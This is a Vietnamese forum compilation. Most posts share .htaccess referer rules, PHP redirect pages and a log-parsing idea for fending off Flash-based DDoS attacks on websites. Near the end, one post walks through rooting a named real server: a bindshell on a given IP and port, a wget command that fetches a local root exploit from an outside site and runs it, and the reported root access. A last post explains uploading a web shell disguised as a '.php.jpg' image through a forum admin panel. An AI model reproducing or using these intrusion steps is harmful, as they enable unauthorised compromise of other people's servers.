Trong lúc thử nghiệm phương pháp chóng DDOS này BQT phát hiện rằng khả năng xác nhận referer của hosting chưa được hiệu quả lắm (chưa xác định được nguyên nhân), nến nếu ta cho xuất dòng link y chang link gốc thì có khi server không hiểu là referer, dẫn đến trường hợp cứ "click vào đây " mãi (IMG:style_emoticons/default/10.gif) Do đó BQT CuaSoTinHoc nảy sinh một sáng kiến nhỏ là thêm các ký tự vô hại đằng sau các link như '?', '&" để đánh dấu cho server biết có sự đổi mới ở các link trên. Và kết quả họat động của cách này khá tốt. Như vậy với cách cấu hình .htaccess và javascript như trên chúng ta hạn chế được phần lớn các chương trình Flash DDOS thông thường tấn công vào MySQL, và với cách này tài nguyên hệ thống được sử dụng rất ít, bởi ngôn ngữ trong .htaccess là ngôn ngữ trên server và đọan javacript trên là không lớn. =============================================== Vẫn cần phải khẳng định rằng phương pháp này vẫn chỉ là tạm thời, và còn có lỗi, bằng chứng là khả năng quick edit trên Firefox không sử dụng được bỡi "tác dụng" của referer. CuaSoTinHoc share phương pháp hạn chế DDOS này để cùng các bạn trao đổi và phát triển nó tốt hơn. Trước mắt có 2 vấn đề cần phát triển: 1. Làm sao cho server họat động thực sự hiệu quả chức năng referer. Để chúng ta khỏi phải thêm các ký tự vô bổ như "?","&" để làm mới link. 2. Cần phải nghiên cứu một phương pháp chống DDOS khác mà không cần phải đưa ra một trang antiddos.htm đầy phản cảm. Mong các bạn đóng góp ý kiến! GiaVinh(CSTH) Share code chống DDos của a2toiyeu.com Bác đã có lòng share thì em cũng share luôn cái nì cho nó tiện. Phương pháp sử dụng của em cũng khá giống với bác có khác một tí: File .htaccess: CODE RewriteEngine on RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?domain.com [NC] RewriteRule \.(php|htm|html|asp)$ http://domain.com/firewall.phtml?%{REQUEST_URI} [QSA] Tạo ở thư mục đầu tiên file firewall.phtml: CODE <? $text=$HTTP_SERVER_VARS['QUERY_STRING']; $text = preg_replace("#php\&#si",'php?',$text); echo('<center><a href=http://domain.com'.$text.'>[Click vao day]</a><br>de den noi dung ban can xem</center>'); ?> File firewall.phtml họat động giống như firewal.htm của cuasotinhoc nhưng nó có vẻ xử lý chậm hơn một chút, bù lại nó không bao giờ bị "dính" lỗi lặp đi lặp lại link. Có điều file phtml vẫn tốn một tí tài nguyên, chỉ có lẽ là không lớn lắm để không đáng lo ngại. Chỉ có một vấn đề nhỏ là khi truy cập vào file index.php?module=xxx thì file phtml xuất ra index.php&module=xxx gây lỗi, buộc lòng phải xài preg_replace để xử lý. Bác nào có cách hay hơn có thể post lên để mọi người tham khảo http://a2toiyeu.com/ Khuongcomputer(CSTH) Cách chống Xflash hữu hiệu Theo tôi nhiều cách chống hiện nay vẫn chưa hiệu quả. Mọi người có thể nghiên cứu cách sau để trị triệt để. Cá nhân tôi thì sử dụng hàm urchinTracker(), chức năng có sẵn của google để track. Anh em tự nghiên cứu và config cho mình nhé. Xfash bị chặn tuyệt đối, cái này tôi đã tự tay test. Botao (vniss) Code: <?php //echo "<pre>"; //print_r($_SERVER); if (!isset($_SERVER['HTTP_REFERER'])) { // print error message die( " <html> <head> <title>Your Forum e.g. DDTH</title> </head> <body style='background-color:black;color:white'> <center><br/><br/><br/><br/><br/> Mời bạn nhấn vào đây để bắt đầu:<br/> <a style='color:yellow' href='{$_SERVER['REQUEST_URI']}'>http://{$_SERVER['SERVER_NAME']} {$_SERVER['REQUEST_URI']}</a> </center> </body> </html> "); } ?> expert(DDTH) Một cách phòng chống DOS ! Để chống DOS có rất nhiều cách, lúc trước Server bạn Vũ cũng bị DOS . Vũ có viết 1 ứng dụng nhỏ bằng C++\Linux . Và thấy khá hiệu quả, các bạn có thể sử dụng. NOTE: Cách này chỉ dùng được khi bạn sở hữu server riêng, và webserver phải là apache . 1. Phân tích nguyên lý làm việc của Aapche trong việc lưu log file : + Mọi user khi vào 1 website, apache sẽ ghi lần access đó vào file access_log trong folder apache\log . Chý ý là nếu website của bạn có nhiều Image thì mỗi Image cũng được tạo 1 access trên apache. Đều này có nghĩ là nếu site của bạn bao gồm 1 trang html và 3 image thì trên access_log sẽ có 4 record. + Bình thường, 1 IP chỉ có thể access tối đa 100 lượt/giây. Trường hợp này đặt giã định Web bạn có ít hơn 20 image, các file CSS . . . ., con số 100 này chỉ là tương đối. + Nếu trong 1 giây, 1 website bi truy cập đến cở 1000 lượt/s thì xem như bị DOS. 2. Cách làm việc của chương trình. + Bạn viết 1 ứng dụng, định kỳ 5 phút sẽ đọc file log 1 lần. + Giả sữ trung bình, 1 giây trên toàn server có 10000 lượt truy cập (tất cả các site trên server). vả kích thuớc file access_log mỗi giây tăng 100KB. Vậy 5 phút sẽ là 600KB. + Nếu sau năm phút, số MB tăng đột biến,cở 1MB , thì xem như server đang bị DOS. Khi đó bạn cho phân tích cú pháp trong file log. Nếu thấy 1 domain (vysa.jp) bị gọi nhiều lần trong 1 giây (1000 lân) . thì tiến hành LOCK IP đó lại, kg cho apache trả lời request IP đó, bằng cách DENY Ip đó trên .htaccess . Chú ý khi phân tích file LOG, hãy tắt Apache đi, sau khi song thi open nó lên lại . Dĩ nhiên các số liệu Vũ đưa ra chỉ là tương đối, bạn có thể tùy biến cho phù hợp với yêu cầu của server mà bạn dùng bạn . Quangvu (ddth.com) [tut]powercontact.de[rooted] Bỏ qua làm thế nào tui có shell trên server đó , vì nó nằm ngoài phạm vi bài viết info của server bindshell lên server 66.29.6.213 , port :11457 bindshell thành công : getroot : thấy kernel "Linux yokto.de 2.4.20 #1 Fri Oct 24 10:31:56 CEST 2003 i686 unknown" , chắc chắn dính 1 đống bug lên www.milw0rm.com tìm xem chọn 1 cái trong list :http://sirhungnguyen.net/kernel/ tui chọn local24 wget lên server : Trích: wget http://sirhungnguyen.net/local24 và run nó rooted , va` end game killua (vniss) 1 cách up shell đơn giản ở IBP Sau khi vào được ACP. Vô Phần LOOK & FEEL để xem và cảm nhận Easy Logo Changer Chọn con shell đã đổi tên .php.jpg rồi up lên Nếu hiện thế này là ok :